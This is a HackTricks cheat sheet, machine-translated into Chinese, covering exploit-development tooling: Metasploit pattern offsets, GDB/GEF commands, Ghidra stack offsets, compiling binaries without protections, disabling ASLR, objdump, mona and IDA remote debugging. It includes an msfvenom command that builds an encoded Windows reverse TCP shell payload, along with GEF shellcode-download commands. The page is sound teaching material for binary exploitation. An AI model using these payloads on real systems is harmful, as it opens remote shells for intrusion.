11 KiB
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品- The PEASS Family
-
加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm.
-
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
Metasploit
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
Shellcodes
Shellcode是一段用于利用软件漏洞的机器码。它通常用于利用缓冲区溢出等漏洞,以在目标系统上执行恶意代码。Shellcode的目标是获取系统访问权限,从而使黑客能够执行各种操作,如远程控制、文件访问和系统信息收集。
Shellcode通常以二进制形式存在,并且必须与特定的操作系统和架构兼容。因此,编写Shellcode时需要考虑目标系统的操作系统类型(如Windows、Linux或macOS)和架构(如x86、x64或ARM)。
Shellcode的编写可以使用汇编语言或高级语言(如C或C++)。一些常见的Shellcode编写工具包括NASM、GCC和LLVM。
在利用漏洞时,Shellcode通常通过将其注入到受攻击的程序中来执行。这可以通过多种方式实现,如利用缓冲区溢出、格式化字符串漏洞或使用特定的漏洞利用工具。
Shellcode的编写是黑客和安全研究人员的重要技能之一。了解Shellcode的工作原理和编写方法可以帮助他们更好地理解和防御各种漏洞攻击。
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
GDB
安装
To install GDB, you can use the following command:
sudo apt-get install gdb
Once the installation is complete, you can verify the installation by running the following command:
gdb --version
This will display the version of GDB installed on your system.
apt-get install gdb
参数
-q --> 不显示横幅
-x <file> --> 从此处自动执行GDB指令
-p <pid> --> 附加到进程
指令
> disassemble main --> 反汇编函数
> disassemble 0x12345678
> set disassembly-flavor intel
> set follow-fork-mode child/parent --> 跟踪创建的进程
> p system --> 查找system函数的地址
> help
> quit
> br func --> 在函数中添加断点
> br *func+23
> br *0x12345678
> del NUM --> 删除指定数量的断点
> watch EXPRESSION --> 如果值发生变化,则中断
> run --> 执行
> start --> 在main函数中开始并中断
> n/next --> 执行下一条指令(不进入函数内部)
> s/step --> 执行下一条指令
> c/continue --> 继续执行直到下一个断点
> set $eip = 0x12345678 --> 更改$eip的值
> info functions --> 函数信息
> info functions func --> 函数的信息
> info registers --> 寄存器的值
> bt --> 栈
> bt full --> 详细的栈信息
> print variable
> print 0x87654321 - 0x12345678 --> 计算
> examine o/x/u/t/i/s dir_mem/reg/puntero --> 以八进制/十六进制/十进制/二进制/指令/ASCII显示内容
- x/o 0xDir_hex
- x/2x $eip --> 从EIP中获取2个字
- x/2x $eip -4 --> $eip - 4
- x/8xb $eip --> 8个字节(b-> 字节, h-> 2字节, w-> 4字节, g-> 8字节)
- i r eip --> $eip的值
- x/w pointer --> 指针的值
- x/s pointer --> 指针指向的字符串
- x/xw &pointer --> 指针所在的地址
- x/i $eip —> EIP的指令
GEF
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
技巧
GDB相同的地址
在调试过程中,GDB的地址与执行二进制文件时使用的地址略有不同。您可以通过以下方式使GDB具有相同的地址:
unset env LINESunset env COLUMNSset env _=<path>将二进制文件的绝对路径放在这里- 使用相同的绝对路径利用二进制文件
- 在使用GDB和利用二进制文件时,
PWD和OLDPWD必须相同
回溯以查找调用的函数
当您有一个静态链接的二进制文件时,所有的函数都属于二进制文件(而不是外部库)。在这种情况下,很难确定二进制文件遵循的流程,例如要求用户输入。
您可以通过使用gdb运行二进制文件,直到要求输入时停止它,然后使用**bt**(回溯)命令查看调用的函数来轻松确定此流程:
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
GDB服务器
gdbserver --multi 0.0.0.0:23947(在IDA中,您需要在Linux机器和Windows机器中填写可执行文件的绝对路径)
Ghidra
查找堆栈偏移
Ghidra非常有用,可以通过有关本地变量位置的信息找到缓冲区溢出的偏移量。
例如,在下面的示例中,local_bc中的缓冲区溢出表示您需要一个偏移量为0xbc。此外,如果local_10是一个canary cookie,表示从local_bc覆盖它的偏移量为0xac。
请记住,RIP保存的第一个0x08属于RBP。
GCC
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> 编译时去除保护
-o --> 输出
-g --> 保存代码(GDB将能够查看它)
echo 0 > /proc/sys/kernel/randomize_va_space --> 在Linux中禁用ASLR
编译shellcode:
nasm -f elf assembly.asm --> 返回“.o”
ld assembly.o -o shellcodeout --> 可执行文件
Objdump
-d --> 反汇编可执行文件的各个部分(查看编译后的shellcode的操作码,查找ROP Gadgets,查找函数地址...)
-Mintel --> Intel语法
-t --> 符号表
-D --> 反汇编全部(静态变量的地址)
-s -j .dtors --> dtors部分
-s -j .got --> got部分
-D -s -j .plt --> plt部分反编译
-TR --> 重定位
ojdump -t --dynamic-relo ./exec | grep puts --> 修改GOT中的"puts"的地址
objdump -D ./exec | grep "VAR_NAME" --> 静态变量的地址(这些存储在DATA部分)。
Core dumps
- 在启动程序之前运行
ulimit -c unlimited - 运行
sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t - 运行
sudo gdb --core=\<path/core> --quiet
更多
ldd executable | grep libc.so.6 --> 地址(如果启用ASLR,则每次都会更改)
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> 循环查看地址是否经常更改
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> "system"的偏移量
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> "/bin/sh"的偏移量
strace executable --> 可执行文件调用的函数
rabin2 -i ejecutable --> 所有函数的地址
Inmunity debugger
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
IDA
在远程 Linux 上进行调试
在 IDA 文件夹中,您可以找到用于在 Linux 上调试二进制文件的可执行文件。要这样做,请将 linux_server 或 linux_server64 可执行文件移动到 Linux 服务器中,并在包含二进制文件的文件夹中运行它:
./linux_server64 -Ppass
然后,配置调试器:调试器(远程Linux)-> 进程选项...:
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?想要在HackTricks中看到你的公司广告吗?或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品——The PEASS Family
-
加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
-
通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。